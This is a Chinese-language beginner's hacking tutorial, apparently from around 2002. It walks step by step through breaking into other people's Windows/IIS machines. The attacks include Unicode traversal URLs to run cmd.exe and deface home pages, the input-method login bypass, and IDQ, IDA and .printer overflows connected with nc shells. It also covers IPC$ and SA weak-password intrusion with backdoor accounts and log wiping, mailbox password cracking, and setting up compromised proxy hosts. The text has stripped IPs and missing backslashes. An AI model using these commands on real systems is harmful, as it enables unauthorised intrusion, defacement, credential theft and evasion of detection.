由于网上很多朋友问我怎么入侵别人的机器

1、由于网上很多朋友问我怎么入侵别人的机器，所以整理了一些我认为容易学的漏洞入侵方法，希望能给初学者一些帮助，下面讲的内容很简单，高手就不用浪费时间看了，：） （1） UNICODE漏洞入侵 “Uicode漏洞”是微软IIS的一个重大漏洞。2001年最热门漏洞之一。 第一步，运行RANGSCAN扫描器，会出现扫描窗口，在最上面有两个from的横框，这是让你填一段IP范围的。在第一个框里填入启始域（打个比方，比如你要扫至55）那么你在第一个框里就填入，在to 后面的框里填入55 意思就是扫至

2、55这段范围里有UNICODE漏洞的机器。接着在中间有一个添加的横框，是要填入内容的如： /scripts/.%c0%af./winnt/system32/cmd.exe 这句话的意思是扫描有 %c0%af 漏洞的机器，对象一般是英文的WIN2000机。 我们把/scripts/.%c0%af./winnt/system32/cmd.exe填入框里，再按一下添加。再按“扫描”。就看到RANGSCAN开始扫了。这时就要看你选的IP范围有漏洞的机器多不多了，如果你选的IP范围好，呵，很快在扫描结果框里就会显示扫到的漏洞主机 如11/scripts/.%c

3、0%af./winnt/system32/cmd.exe 意思是11主机有 %c0%af 漏洞， 目标有了，我们马上打开浏览器。在网址栏里输入： 11/scripts/.%c0%af./winnt/system32/cmd.exe?/c+dir+c: 回车 意思是查看机器里C盘的根目录。一般情况下，我们都可以在浏览器里看到类似如： Directory of c: 2002-03-13 03:47p 289 default.asp 2002-02-11 03:47p 289 default.htm 2002-03-09 04:35p Documen

4、ts and Settings 2002-02-11 03:47p 289 index.asp 2002-02-11 03:47p 289 index.htm 2002-05-08 05:19a Inetpub 2002-01-19 10:37p MSSQL7 2002-03-09 04:22p Program Files 2002-01-23 06:21p WINNT 4 File(s) 1,156 bytes 5 Dir(s) 2,461,421,568 bytes free - 的目录列表。也会碰到看不到文件的空目录。 好，我们成功看到了机器里的C盘了。 我们在浏览器里输入： 192.1

5、68.0.111/scripts/.%c0%af./winnt/system32/cmd.exe?/c+set 回车 CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: ALLUSERSPROFILE=C:Documents and SettingsAll Users CommonProgramFiles=C:Program FilesCommon Files COMPUTERNAME=

6、ON ComSpec=C:WINNTsystem32cmd.exe CONTENT_LENGTH=0 GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* HTTP_ACCEPT_LANGUAGE=zh-cn HTTP_CONNECTION=Keep-Alive HTTP_HOST=11 HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90)

7、 HTTP_ACCEPT_ENCODING=gzip, deflate HTTPS=off INSTANCE_ID=1 LOCAL_ADDR=11 NUMBER_OF_PROCESSORS=1 Os2LibPath=C:WINNTsystem32os2dll; OS=Windows_NT Path=C:WINNTsystem32;C:WINNT;C:WINNTSystem32Wbem;C:MSSQL7BINN PATH_TRANSLATED=c:inetpubwwwroot PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.W

8、SF;.WSH PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Fa - 哈，我们看到了机器设置内容了，我们找找，主要看PATH_TRANSLATED=c:inetpubwwwroot 意思是他的主页存放在c:inetpubwwwroot的目录里，知道就好办了。 我们用命令： 11/scripts/.%c0%af./winnt/system32/cmd.exe?/c+dir+c:inetpubwwwroot回车 我们就可以看到c:inetpubwwwroot目录里的文件了，一般都有default.asp, defau

9、lt.htm , index.htm, index.asp,等等。我们以目录里有index.asp做例子。 我们先要做的是把文件的只读属性解除掉，很多管理员都把文件设置只读。 我们用命令： 11/scripts/.%c0%af./winnt/system32/attrib.exe?%20-r%20-h%20c:inetpubwwwrootindex.asp 回车 当看到下面的英文 CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP header

10、s. The headers it did return are: 恭喜你，你可以改他的网页了。 - 但如果你看到下面的英文就不成功，只好换其他机器了。 CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: Access denied - C:inetpubwwwrootindex.asp - 继续。现在用ECHO改网页的内容。 11/scripts/.%c0%a

11、f./winnt/system32/cmd".exe?/c+echo+网站有漏洞+> c:inetpubwwwrootindex.asp 回车 当看到 CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: 的提示，你已经改了他的网页了，呵呵，你想改成什么字也行。只要把命令中的中文换成你自己的中文就行了。 英文WIN2000 /scripts/.%c0%af./winnt/s

12、ystem32/cmd.exe?/c+dir+c: 中文WIN2000 /scripts/.%c0%2f./winnt/system32/cmd.exe /scripts/.%c1%1c./winnt/system32/cmd.exe WIN NT4 /scripts/.%c1%9c./winnt/system32/cmd.exe 英文WIN2000 /scripts/.%c0%af./winnt/system32/cmd.exe 通用代码：/scripts/.%255c./winnt/system32/cmd.exe?/c+dir+c: （2） Windows2000输入法漏洞 先用端口扫描

13、器扫描开放3389的机器，然后用终端客户端程序进行连接，用CTRL+SHIFT快速切换输入法，切换至全拼，这时在登录界面左下角将出现输入法状态条，在输入法状态条上按鼠标右键。选择“帮助” “输入法指南” “选项”。（如果发现“帮助”呈灰色，放弃，因为对方很可能发现并已经补上了这个漏洞。）按右键，选择“跳转到URL”，输入：c:winntsystem32在该目录下找到“net.exe”，为“net.exe”创建一个快捷方式，右键点击该快捷方式，在“属性” “目标”c:winntsystem32net.exe 后面空一格，填入“user guest /active :yes”。 点击“确定”（目的

14、是，利用“net.exe”激活被禁止使用的guest账户）运行该快捷方式。（此时你不会看到运行状态，但guest用户已被激活。）然后重复操作上面的，在 “属性” “目标” c:winntsystem32net.exe 后面空一格，填入localgroup administrators guest /add（这一步骤目的是，利用“net.exe”将guest变成系统管理员。）再次登录终端服务器，以“guest”身份进入，此时guest已是系统管理员，已具备一切可执行权及一切操作权限。现在，我们可以像操作本地主机一样，控制对方系统。 （3） idq溢出漏洞 要用到3个程序，一个Snake IIS

15、IDQ 溢出程序GUI版本，一个扫描器，还有NC。 首先扫描一台有IDQ漏洞的机器，然后设置Snake IIS IDQ 溢出程序，在被攻击IP地址后面写上对方的IP.端口号一般不需要改动，软件的默认绑定CMD.EXE的端口是813.不改了.用默认的，左面选择操作系统类型，随便选一个，我们选IIS5 English Win2k Sp0吧，点击IDQ溢出OK出现发送Shellcode成功的提示了，然后我们用NC来连接。 进入MS-DOS。进入“nc”的目录。然后：nc -v IP 813 c:>nc -vv IP 813 IP: inverse host lookup failed: h_e

16、rrno 11004: NO_DATA (UNKNOWN) IP 813 (?): connection refused sent 0, rcvd 0: NOTSOCK c:> 看来没成功. 别灰心，在来一次，换用IIS5 English Win2k Sp1试试。 c:>nc -vv IP 813 IP: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) IP 813 (?) open Microsoft Windows 2000 Version 5.00.2195 (C) Copyright 1985-200

17、0 Microsoft Corp. C:WINNTsystem32> 哈哈，终于上来啦，你现在可是system权限，下面该怎么做就看你的啦。 （4）IDA溢出漏洞 所用程序：idahack 进入MS-DOS方式（假设idq.exe在c:下） c:idahack.exe 运行参数：c:idahack chinese win2k : 1 chinese win2ksp1: 2 chinese win2ksp2: 3 english win2k : 4 english win2ksp1: 5 english win2ksp2: 6 japanese win2k : 7 japanese win

18、2ksp1: 8 japanese win2ksp2: 9 korea win2k : 10 korea win2ksp1: 11 korea win2ksp2: 12 chinese nt sp5 : 13 chinese nt sp6 : 14 c:idahack J80 1 80 connecting. sending. Now you can telnet to 80 port Good luck 好，现在你可以telnet它的80端口了，我们用NC来连接。 C:nc 80 Microsoft Windows 2000 Version 5.00.

19、2195 （C）版权所有 1985-1998 Microsoft Corp C:WINNTsystem32> OK，现在我们现在上来了，也可IDQ一样是SYSTEN权限，尽情的玩吧。 （5）.printer漏洞 这个漏洞，我们用两个程序来入侵。iis5hack和nc。 C:>iis5hack iis5 remote .printer overflow. writen by sunx for test only, dont used to hack, :p usage: D:IIS5HACK.EXE 用法: D:IIS5HACK <

20、;溢出的主机> <主机的端口> <主机的类型> <溢出的端口> chinese edition: 0 chinese edition, sp1: 1 english edition: 2 english edition, sp1: 3 japanese edition: 4 japanese edition, sp1: 5 korea edition: 6 korea edition, sp1: 7 mexico edition: 8 mexico edition, sp1: 9 c:>iis5hack 9 80 1 119 i

21、is5 remote .printer overflow. writen by sunx for test only, dont used to hack, :p Listn: 80 connecting. sending. Now you can telnet to 3739 port good luck :) 溢出成功！ c:>nc 9 119 Microsoft Windows 2000 Version 5.00.2195 (C) 版权所有 1985-2000 Microsoft Corp

22、. C:WINNTsystem32> OK，我们又成功取得system权限！玩吧。 （6）139端口入侵 我们先确定一台存在139端口漏洞的主机。用扫描工具扫描！比如SUPERSCAN这个端口扫描工具。假设现在我们已经得到一台存在139端口漏洞的主机，我们要使用nbtstat -a IP这个命令得到用户的情况！现在我们要做的是与对方计算机进行共享资源的连接。 用到两个NET命令，下面就是这两个命令的使用方法 NET VIEW? 作 用：显示域列表、计算机列表或指定计算机的共享资源列表。? 命令格式：net view computername | /domain:domainname? 参

23、数介绍：? <1>键入不带参数的net view显示当前域的计算机列表。? <2>computername 指定要查看其共享资源的计算机。? <3>/domain:domainname指定要查看其可用计算机的域? NET USE? 作用：连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息。? 命令格式：net use devicename | * computernamesharenamevolume? password | * /user:domainnameusername /delete |? /persistent:yes | no? 参

24、数介绍：? 键入不带参数的net use列出网络连接。? devicename指定要连接到的资源名称或要断开的设备名称。? computernamesharename服务器及共享资源的名称。? password访问共享资源的密码。? *提示键入密码。 /user指定进行连接的另外一个用户。? domainname指定另一个域。? username指定登录的用户名。? /home将用户连接到其宿主目录? /delete取消指定网络连接。? /persistent控制永久网络连接的使用。? C:net use IP C:net view IP 我们已经看到对方共享了他的C，D，E三个盘 我们要做的

25、是使用NBTSTAT命令载入NBT快取. c:>nbtstat R 载入NBT快取 c:>nbtstat c 看有无载入NBT快取 现在我们已经得到的139端口漏洞的主机IP地址和用户名，现在就该是我们进入他计算的时候了，点击开始-查找-计算机，将刚才找到的主机名字输入到上面，选择查找，就可以找到这台电脑了！双击就可以进入，其使用的方法和网上领居的一样。 （7）IPC入侵 所有程序：流光 开始：在主界面选择 探测探测POP3/FTP/NT/SQL主机选项，或者直接按Ctrl+R。输入我们要破解的IP段，我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获

26、得IPC弱口令，这样可以加快扫描的速度 ：）填入IP，选择扫描NT/98主机。在“辅助主机”那里的“IPC$主机”前面打勾,然后在菜单了选“探测”，扫描出结果以后，“IPC$主机”，选中后按“CTRL+F9”就开始探测IPC用户列表。会出现“IPC自动探测” 的窗体，把那两个选项都选了，然后点“选项” 为了加快弱口令扫描速度，这里的两个选项我们可以全部取消记住。然后点“确定”出来后点“是”就开始探测了。一会儿，结果出来了。比如我们探测出了用户名为“admin”的管理员，密码为“admin”，现在我们用命令提示符，熟悉下命令吧，输入: net usefile:/对方ip/ipc$ "密

27、码"/user:"用户名" | 建立远程连接 copy icmd.exe file:/对方ip/admin$ |admin$是对方的winnt目录 net time file:/对方IP/ |看看对方的本地时间 at file:/对方ip/ 启动程序的时间启动程序名 启动程序的参数 |用at命令来定时启动程序 telnet 对方ip端口 我们也可以改网页： net use ipipc$ "admin" /uesr:"admin" 回车。 出现“命令成功完成”。 然后输入“dir ipc$*.*” 看到C:下所有内容。现在我们

28、来改主页。一般主页放在c:inetpubwwwroot里面 输入“dir ipc$inetpubwwwroot*.*”。就可以看到index.htm或index.asp或default.htm或 default.asp.这些就是主页了，假如你黑页在C:下，就输入"copy 主页文件 ipc$inetpubwwwroot"覆盖原文件这样就行了，简单吧？ 日志清除，断开连接 ： 我们copy cl.exe ，clear.exe 上去，再执行，就可以清除日志，比如clear all ：清除所有的日志。然后在断开连接：net use file:/ip/ipc$ /delete （8

29、）超管SA空密码漏洞 使用的工具:流光IV 启动流光，按Ctrl+R。出现扫描设置对话框，设置扫描IP段，并且选择扫描的类型为SQL。点击“确定”，进行扫描，假设我们取得主机：，然后点击“工具” SQL远程命令（或者Ctrl+Q），填入主机IP（）、用户（sa）、密码（空）点击“连接”，出现远程命令行的界面。 net user heiying heiying1 /add 填加一个heiying的帐号和密码heiying1 net localgroup administrators heiying /add 将我们创建的heiying帐号填加到管理组。 下面我

30、们来做跳板： 打开cmd.exe,输入net use ipc$ "heiying1" /user:"heiying"命令 显示命令成功完成。 上传srv.exe： copy srv.exe admin$system32 上传ntlm.exe： copy ntlm.exe admin$system32 启动服务： 首先用net time 看看对方主机的时间,(假如回显 的本地时间是上午12.00)，然后我们用at 2 12.01 srv.exe命令

31、来启动srv.exe。等一分钟后就可以telnet了。 一分钟后在本机命令提示符中输入： telnet . 99 然后我们要启动NTLM.exe： 在telnet状态下直接输入ntlm回车。 显示：windows 2000 telnet dump,by assassin,all rights reserved.done! 然后从新启动对方主机的telnet服务：net stop telnet（先关闭telnet服务）再输入net start telnet（启动telnet服务）然后我们退出telnet，然后在命令行下输入telnet ,依照提示,接着输入用户名：heiying

32、,密码：heiying1，回车。这样,我们的跳板就做好了，简单吧？ （上面上传的srv和ntlm等东东还有一个简便方法，全都可以直接用流光工具菜单里的种植者上传，60秒后自动运行，不用敲命令！呵呵方便吧！） （9）如何用流光破解信箱密码 这次的目标是21CN，运行流光IV，选择POP3主机-右键-编辑-添加，填上：，其他的就用默认吧！不用更改，确定就行了。到下一步，还是右键-从列表中添加-选择一个字典，没有的到网上下载一个字典，或者到黑白网络去下载，我们用简单模式探测！这样速度比较快，然后就等着成果吧，上次我以下就破了5个邮箱出来。 （10）frontpage进行攻击 打开您自己的Frontp

33、age，文件菜单下选择“打开站点”，然后在文件夹框里写入（http:/不要漏掉）。按下“打开”按钮，一会后，出现了文件夹，成功了，现在就可以操作网页文件了。如果跳出错误信息，表示有密码，我们用以下/_vti_pvt/service.pwd,这是默认的密码文件，下载下来，找个解密器破密码吧！破出来后就还可以改网页。这个只能改该网页，没什么玩的。 （11）用肉鸡做代理跳板 需要软件：srv.exe，ntlm.exe，snakeSksockserver.exe，SocksCap.exe。 首先我们在命令提示符下建立IPC$管道： net u

34、se ipc$ "密码" /user:帐号 通道建立好后，我们把srv.exe sss.exe ntlm.exe全部上传。 c:copy srv.exe 0admin$ 1 files copied! c:copy ntlm.exe 0admin$ 1 files copied! c:copy sss.exe 0admin$ 1 files copied! 复制完毕后， 看肉鸡上现在的时间： c:net time 显示当前时间是 2002/4/13 晚上 09：00 我们来启动

35、srv.exe c:at 09:01 srv.exe 等到09：01后。我们来连接肉鸡： c:telnet 99 连上后显示： c:winntsystem32> 接着我们启动NTLM.exe c:winntsystem32>ntlm 显示： Windows 2000 Telnet Dump, by Assassin, All Rights Reserved. Done! C:WINNTsystem32> 首先我们终止srv.exe的telnet服务： C:WINNTsystem32>net stop telnet 继续： C:WINNTsystem32>net start telnet 再启动TELNET。 OK，我们来登陆 c:>telnet *= Microsoft Telnet *= c:> 好了，一切顺利，我们现在正式开始做代